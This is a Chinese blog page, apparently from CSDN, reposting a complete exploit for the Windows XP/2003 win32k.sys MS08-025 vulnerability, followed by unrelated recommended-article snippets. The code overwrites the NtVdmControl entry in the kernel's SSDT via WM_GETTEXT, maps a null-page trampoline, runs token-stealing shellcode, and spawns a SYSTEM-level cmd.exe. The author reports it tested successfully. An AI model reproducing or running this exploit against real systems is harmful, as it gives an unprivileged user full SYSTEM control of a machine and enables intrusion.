MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit2

最新推荐文章于 2011-04-14 13:00:29 发布
原创 最新推荐文章于 2011-04-14 13:00:29 发布 · 1k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#system #null #token #callback #cmd
#search
本文介绍了一种针对Windows XP SP2系统的MS08-025漏洞利用方法,通过覆盖SSDT表中的NtVdmControl地址来实现权限提升。文中详细展示了如何使用C语言编写shellcode并进行内存分配,最终达到从普通用户权限升级到SYSTEM权限的目的。 
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行



#include <stdio.h>

#include <windows.h>



typedef LONG NTSTATUS;

typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,

                                       PVOID            *BaseAddress,

                                       ULONG                ZeroBits,

                                       PULONG           RegionSize,

                                       ULONG                AllocationType,

                                       ULONG                Protect );

typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);

void ErrorQuit(char *msg)

{

    printf("%s:%x/n", msg, GetLastError());

    ExitProcess(0);

}

ZWVDMCONTROL    ZwVdmControl=NULL;

OSVERSIONINFOEX OsVersionInfo;



_declspec(naked) int ShellCode()

{



      if ( OsVersionInfo.dwMinorVersion == 1 ) {



       __asm {



               nop

               nop

               nop

               nop

               nop

               nop



               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)

               Mov eax,[eax]



               mov esi,[eax+0x220]

               mov eax,esi



searchXp:



               mov eax,[eax+0x88]

               sub eax,0x88

               mov edx,[eax+0x84]

               cmp edx,0x4 // Find System Process

               jne searchXp



               mov eax,[eax+0xc8] // 获取system进程的token

               mov [esi+0xc8],eax // 修改当前进程的token



               ret 8



       }

   }

   if ( OsVersionInfo.dwMinorVersion == 2 ) {



       __asm {



           nop

               nop

               nop

               nop

               nop

               nop



               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)

               Mov eax,[eax]



               mov esi,[eax+0x220]

               mov eax,esi



search2003:



               mov eax,[eax+0x98]

               sub eax,0x98

               mov edx,[eax+0x94]

                cmp edx,0x4 // Find System Process

               jne search2003



               mov eax,[eax+0xd8] // 获取system进程的token

               mov [esi+0xd8],eax // 修改当前进程的token

               ret 8



       }

   }





}



void InitTrampoline()

{



   PNTALLOCATE NtAllocateVirtualMemory;

   LPVOID       addr = (LPVOID)3;

   DWORD       dwShellSize=0x1000;

   unsigned char trampoline[]="/x68/x00/x00/x00/x00" //push 0x0

                               "/xc3";               // retn



   NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");



   if( !NtAllocateVirtualMemory )

       exit(0);



   NtAllocateVirtualMemory(   (HANDLE)-1,

                               &addr,

                               0,

                               &dwShellSize,

                               MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,

                               PAGE_EXECUTE_READWRITE );



   if( (PULONG)addr )

   {

       printf("/n[++] Error Allocating memory/n");

       exit(0);

   }





   *(PULONG*)(trampoline+1)=(PULONG)ShellCode;

   memcpy(NULL,trampoline,sizeof(trampoline)-1);

}

int Callback_Overview()

{

   printf("/n");

   printf("=====================================================================   /n");

   printf("/t/tMicrosoft Windows XP SP2 - MS08-025 -       /n");

   printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit   /n");

   printf("=====================================================================   /n");

   printf("+ References:/n");

   printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx/n");

   printf(" http://hi.baidu.com/vessial/n/n");

   return 1;

}



void GetFunction()

{

    HANDLE    hNtdll,hNtos;

   

    hNtdll = LoadLibrary("ntdll.dll");

    if(hNtdll == NULL)

        ErrorQuit("LoadLibrary failed./n");

       

    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");

    if(ZwVdmControl == NULL)

        ErrorQuit("GetProcAddress failed./n");

              

    FreeLibrary(hNtdll);

}

int main(int argc, char **argv)

{



   //PULONG   PntVdmControl=0x805F0DB0;

PULONG   PntVdmControl=0x80502460; //通过*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4获得

   

    

   STARTUPINFOA                stStartup;

   PROCESS_INFORMATION            pi;





   Callback_Overview();

   GetFunction();

   RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );

   OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);

   GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);



   if ( OsVersionInfo.dwMajorVersion != 5 ) {



       printf( "Not NT5 system/n" );

       ExitProcess( 0 );

   }

   //Get Operatiny System Version

       

   InitTrampoline();



   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );

   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);//覆盖NtVdmControl所在的SSDT表,覆盖后结果为0x0

   printf("/n[+] Executing Shellcode.../n");



   ZwVdmControl(0, NULL);//这里就是call 0x0了,跳转执行我们的shellcode,哈哈:)

   GetStartupInfo( &stStartup );



   CreateProcess( NULL,

       "cmd.exe",

       NULL,

       NULL,

       TRUE,

       NULL,

       NULL,

       NULL,

       &stStartup,

       &pi );   //此时创建的cmd.exe是SYSTEM权限



  

   printf("[+] Exiting.../n");



   return TRUE;

}

我在XP测试成功,下面的第一个cmd是SYSTEM权限,这是我们提权后的,一个cmd是test权限
iiprogram
关注
普通恶意代码技术分析与检测
weixin_30279315的博客
03-12 450
创建时间:2008-03-07文章属性:原创文章提交:fleshwound (fleshwound_at_126.com)fleshwound(fleshwound@smatrix.org)http://www.smatrix.org1 引言  近些年来,恶意代码依赖一些特殊的Native API函数和内核系统函数进行感染、传播、隐藏的这种趋势愈加明显代码,并大量的使用了多重加密壳、驱动关联壳、变...
无驱动执行Ring0代码
wowbell的专栏
02-23 1140
<br />// 原理:通过/Device/PhysicalMemory修改NtVdmControl入口,跳转到Ring0Code<br /> //************************************************************************<br /> #include<br /> #include<br /> #include<br /><br /> #pragma comment (lib,"ntdll.lib") // Copy From
在NT系列操作系统里让自己“消失”
竹君子之家
09-10 1848
创建时间:2004-03-06文章属性:原创文章提交:SoBeIt (kinsephi_at_hotmail.com)===================[ 在NT系列操作系统里让自己“消失”]==================                                               SoBeIt            作者:Holy_Father     
王宇:NtVDM子系统拾趣
05-29
9月25日,SyScan360 2013国际前瞻信息安全会议在北京国家会议中心举行。360安全研究工程师王宇发表题为《NtVdm子系统拾趣》的演讲,针对Windows组件NtVdm子系统的安全性进行深入分析。
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
weixin_33889665的博客
04-18 123
以下消息来自幻影论坛[Ph4nt0m]邮件组 [url]http://hi.baidu.com/vessial/blog/item/4ae4291b46f8e91c8718bfc2.html[/url] 欢迎转载,但希望大家注明出处和保留其完整性,谢谢:)MS08-025 win32k.sys NtUserFnOUTSTRING Privileg...
NtDLL的API
伤了
04-14 903
转帖From:郁金香的csdn博客http://blog.csdn.net/kkksi13996362600/archive/2009/03/05/3959312.aspx   1. 内容 2. 介绍 3. 文件 3.1 NtQueryDirectoryFile 3.2 NtVdmControl 4. 进程 5. 注册表 5.1 NtEnumerateKey 5.2 NtEnu...
MS08-025通过覆盖SSDT表进行执行shellcode
04-16 1078
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行#include #include typedef LONG NTSTATUS;typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE    
YOLO算法工业车间机器人目标检测数据集-624张-标注类别为包装-仓储-分料盒-干躁-混料-混料机-基础-基础设备-捏合设备-皮带线-切割-切割设备-机器人-烧成-原料-中控.zip
06-27
【注:该页面底部资源详情处,可查看数据集可视化效果】 1. YOLO目标检测数据集, 适用于YOLOV5、yolov7,yolov8, yolov11, yolov13, yolo26等系列算法,含标签,已标注好,可以直接用来训练,包含YOLO格式标签和VOC格式标签; 2. 内置data.yaml数据集配置文件,已经划分好了训练集、验证集等; 3. 数据集和模型具体情况可参考 https://blog.csdn.net/zhiqingAI/article/details/124230743?spm=1001.2014.3001.5502
目标跟踪与多传感器融合技术探讨[代码]
06-27
本文主要探讨了目标跟踪、多传感器融合及非线性滤波等领域的算法与技术。博主擅长提供代码复现、技术支持及学术探讨,并欢迎通过私信或微信联系。在估计、滤波与融合方面,涵盖了多种线性与非线性滤波算法,如卡尔曼滤波(KF)、扩展卡尔曼滤波(EKF)、无迹卡尔曼滤波(UKF)、中心差分滤波(CDKF)、强跟踪滤波(STF)、容积卡尔曼滤波(CKF)、求积卡尔曼滤波(QKF)、高斯近似滤波(GAF)、高斯混合滤波(GMF)及粒子滤波(PF)等。多传感器融合方面包括集中式、分布式、序贯及联邦卡尔曼滤波等方法。参数估计算法涉及最大似然(ML)、最小二乘(LS)、最大后验(MAP)及最小均方误差(MMSE)。目标跟踪方面,涵盖了基于不同滤波算法和运动模型(如CV、CA、CT、Singer、CS、Jerk等)的机动与非机动目标跟踪,以及基于不同传感器(如雷达、声纳、AOA、TOA、TDOA等)的跟踪方法。此外,还涉及IMM、广义伪贝叶斯等组合算法,以及二维组网雷达三维跟踪、抗野值跟踪、实时显示等具体问题。
MySQL远程连接错误解决[项目源码]
06-27
YOLO算法家庭厨房嵌入式烤箱目标检测数据集-1092-标注类别为烤箱.zip
06-27
【注:该页面底部资源详情处,可查看数据集可视化效果】 1. YOLO目标检测数据集, 适用于YOLOV5、yolov7,yolov8,v9, yolov11, yolov13, yolo26等系列算法,含标签,已标注好,可以直接用来训练; 2. 内置data.yaml数据集配置文件,已经划分好了训练集、验证集等; 3. 数据集和模型具体情况可参考 https://blog.csdn.net/zhiqingAI/article/details/124230743?spm=1001.2014.3001.5502
YOLO算法室内居家环境跌倒目标检测数据集-364张-标注类别为跌倒-未跌倒.zip
06-27
【注:该页面底部资源详情处,可查看数据集可视化效果】 1. YOLO目标检测数据集, 适用于YOLOV5、yolov7,yolov8,v9, yolov11, yolov13, yolo26等系列算法,含标签,已标注好,可以直接用来训练; 2. 内置data.yaml数据集配置文件,已经划分好了训练集、验证集等; 3. 数据集和模型具体情况可参考 https://blog.csdn.net/zhiqingAI/article/details/124230743?spm=1001.2014.3001.5502
酒店管理系统(含部署教程)
最新发布
06-27
酒店管理系统(含部署教程)
Win10下MySQL root密码重置方法[可运行源码]
06-27
本文详细介绍了在Windows 10系统下,当MySQL的root用户密码忘记时的解决方案。首先,通过快捷键Win+R打开运行窗口,输入services.msc进入服务管理界面,找到MySQL服务并将其停止。接着,找到MySQL的安装目录,定位到配置文件(通常是my.ini或my-default.ini),记录其路径。然后,打开命令提示符窗口,执行命令:mysqld --defaults-file="配置文件路径" --console --skip-grant-tables,以跳过权限验证方式启动MySQL服务。之后,另开一个命令行窗口,输入mysql -u root -p直接进入MySQL命令行界面,无需密码。最后,在MySQL命令行中依次执行show database;、use mysql;、update user set password=password("新密码") where user="root";,即可成功更新root用户的密码,解决忘记密码的问题。
stm32单片机项目资料课程设计文档C语言程序代码原理图电路PCB实例传感器控制继电器模块DXP资料
06-27
stm32单片机项目资料课程设计文档C语言程序代码原理图电路PCB实例传感器控制继电器模块DXP资料
【风电功率预测】【多变量输入单步预测】基于CNN-BiGRU-Attention的风电功率预测研究(Matlab代码实现)
06-27
内容概要:本文研究了基于CNN-BiGRU-Attention混合神经网络模型的风电功率预测方法,旨在提升风力发电功率预测的准确性。该模型融合卷积神经网络(CNN)以提取输入变量中的局部时空特征,结合双向门控循环单元(BiGRU)充分捕捉时间序列前后向的长期依赖关系,并引入注意力机制(Attention)动态加权关键时间步的特征信息,增强模型对重要时刻的敏感度。研究采用多变量输入进行单步预测,综合纳入风速、风向、温度等多种气象因素作为模型输入,全面反映环境变量对风电输出的影响。通过Matlab平台完成模型构建、训练与仿真验证,实验结果表明该混合模型在预测精度与稳定性方面优于传统单一模型,有效提升了风电功率预测性能。; 适合人群:具备一定机器学习与深度学习理论基础,熟悉Matlab编程环境,从事新能源发电预测、电力系统调度、智能算法应用等相关领域的科研人员、工程技术人员及高校研究生。; 使用场景及目标:①应用于风电场实际运行中的短期功率预测,提高电网调度的安全性与可再生能源消纳效率;②为深度学习模型在复杂时序预测任务中的设计与优化提供实践范例,推动AI技术在能源系统智能化中的深度融合;③支持学术研究复现、课程项目设计与教学演示,帮助深入理解CNN、BiGRU与Attention机制的协同建模范式与实现细节。; 阅读建议:建议结合提供的Matlab代码进行动手实践,重点关注数据预处理流程、模型网络结构设计、超参数调优及训练收敛过程,鼓励尝试替换输入变量组合、调整网络层数或优化注意力结构,以进一步探究模型性能边界并提升预测鲁棒性。
基于Benders、TSO-DSO协调的不确定性的输配电网双层优化模型研究(Matlab代码实现)
06-27
内容概要:本文研究了基于Benders分解算法与输电网-配电网运营商(TSO-DSO)协调机制的双层优化模型,旨在有效应对新能源出力波动、负荷不确定性等对现代电力系统运行带来的挑战。模型上层由输电网运营商(TSO)负责全局资源优化与主网稳定性调控,下层由多个配电网运营商(DSO)实现本地分布式能源的灵活调度,通过Benders分解实现上下层之间的迭代协调与信息交互,从而在保障系统安全的前提下提升整体运行的经济性与鲁棒性。研究提供了完整的Matlab代码实现,涵盖数学建模、算法求解、收敛性分析及仿真结果可视化等环节,有助于深入理解双层优化架构在输配电网协同调度中的具体应用与技术细节。; 适合人群:具备电力系统分析、优化理论基础及一定Matlab编程能力的研究生、科研人员,以及从事电网调度、能源系统规划等相关领域的工程技术人员。; 使用场景及目标:①掌握Benders分解在电力系统双层优化问题中的建模与求解流程;②理解TSO-DSO协同机制下输配电网交互建模的核心思想与实现方法;③复现并拓展高水平学术论文中的优化模型,服务于科研项目攻关或实际工程仿真需求。; 阅读建议:建议结合凸优化理论、电力系统经济调度与Benders分解原理进行系统学习,优先运行并调试所提供的Matlab代码,调整关键参数以观察算法收敛行为与模型性能变化,从而深化对协调机制与优化机理的理解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值